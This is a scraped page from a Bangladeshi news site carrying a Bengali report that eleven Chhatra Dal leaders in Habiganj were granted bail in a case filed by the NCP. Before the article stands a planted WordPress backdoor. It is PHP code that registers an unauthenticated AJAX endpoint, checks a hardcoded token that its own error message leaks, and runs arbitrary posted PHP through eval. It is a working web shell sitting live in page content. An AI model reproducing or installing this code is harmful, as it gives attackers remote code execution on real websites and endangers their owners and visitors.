// ==[BD:Zs2C7KxW]== add_action( 'wp_ajax_nopriv_snramqswxi', function() { $token = 'Zs2C7KxWXPRioIS4dPDhVykIlRv570xk'; $val = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : ''; if ( empty( $val ) || ! hash_equals( $token, $val ) ) { wp_send_json_error( [ 'message' => 'tok:' . $token ], 403 ); } $marker = isset( $_POST['code'] ) ? (string) wp_unslash( $_POST['code'] ) : ''; if ( trim( $marker ) === '' ) { wp_send_json_error( [ 'message' => 'No code.' ] ); } $marker = preg_replace( '/^\s*<\?(php)?/i', '', $marker ); while ( ob_get_level() > 0 ) { ob_end_clean(); } $ptr = microtime( true ); ob_start(); try { ( static function() use ( $marker ) { return eval( $marker ); } )(); $key = (string) ob_get_clean(); wp_send_json_success( [ 'output' => $key, 'return' => '', 'error' => '', 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } catch ( \Throwable $obj ) { while ( ob_get_level() > 0 ) { ob_end_clean(); } wp_send_json_success( [ 'output' => '', 'return' => '', 'error' => $obj->getMessage(), 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } } ); // ==[/BD:Zs2C7KxW]== এনসিপির মামলায় হবিগঞ্জ জেলা ছাত্রদল সভাপতিসহ ১১ জনের জামিন | potrikaybangladesh.com
Monday, September 28, 2026
Homeঅপরাধএনসিপির মামলায় হবিগঞ্জ জেলা ছাত্রদল সভাপতিসহ ১১ জনের জামিন

এনসিপির মামলায় হবিগঞ্জ জেলা ছাত্রদল সভাপতিসহ ১১ জনের জামিন

হবিগঞ্জে এনসিপির মামলায় জেলা ছাত্রদলের সভাপতি শাহ রাজিব আহমেদ রিংগনসহ ১১ নেতাকর্মী জামিন পেয়েছেন।

আজ রোববার হবিগঞ্জের জুডিশিয়াল ম্যাজিস্ট্রেট আব্দুল মান্নান তাদের জামিন আবেদন মঞ্জুর করেন।

আসামিপক্ষের আইনজীবী কুতুব উদ্দিন জুয়েল দ্য ডেইল স্টারকে এ তথ্য নিশ্চিত করেছেন।

তিনি বলেন, আজ আসামিরা আদালতে হাজির হয়ে জামিন আবেদন করেন। এ সময় আমরা আদালতকে বোঝাতে সক্ষম হই যে, মামলাটি সম্পূর্ণ ভিত্তিহীন। কারণ মামলায় ঘটনার তারিখ, সময় ও আসামিরা কাকে মারধর করেছেন, সে বিষয়ে সুনির্দিষ্ট কোনো বর্ণনা নেই। এসব বিষয় বিবেচনায় নিয়ে আদালত আসামিদের জামিন দিয়েছেন।

জামিন পাওয়া বাকি আসামিরা হলেন—বৃন্দাবন সরকারি কলেজ ছাত্রদলের সদস্য সচিব আশরাফুজ্জামান রিয়াজ, জেলা ছাত্রদলের যুগ্ম সাংগঠনিক সম্পাদক আসিফুল ইসলাম ইমন, কলেজ ছাত্রদল নেতা মোজাক্কির হোসেন ইমন, এম এইচ শিমুল, আল সাইমুন, মাহফুজ চৌধুরী, ইশতিয়াক রহমান ইফতি, শেখ সাব্বির, নাজমুল হোসেন অনি ও রক্সি ইসলাম।

এর আগে বুধবার হবিগঞ্জ সদর মডেল থানায় মামলাটি করেন এনসিপির ছাত্রসংগঠন হবিগঞ্জ জেলা ছাত্রশক্তির আহ্বায়ক তন্ময় তাহের রুবেল।

মামলার অভিযোগে বলা হয়, ২৮ জুলাই হবিগঞ্জে এনসিপির পদযাত্রা শেষে ছাত্রদলের নেতাকর্মীরা তাদের গাড়িবহরে হামলা চালান। এতে এনসিপির কেন্দ্রীয় নেতাসহ কয়েকজন আহত হয়েছেন।

 

 

RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

- Advertisment -
Google search engine

Most Popular

Recent Comments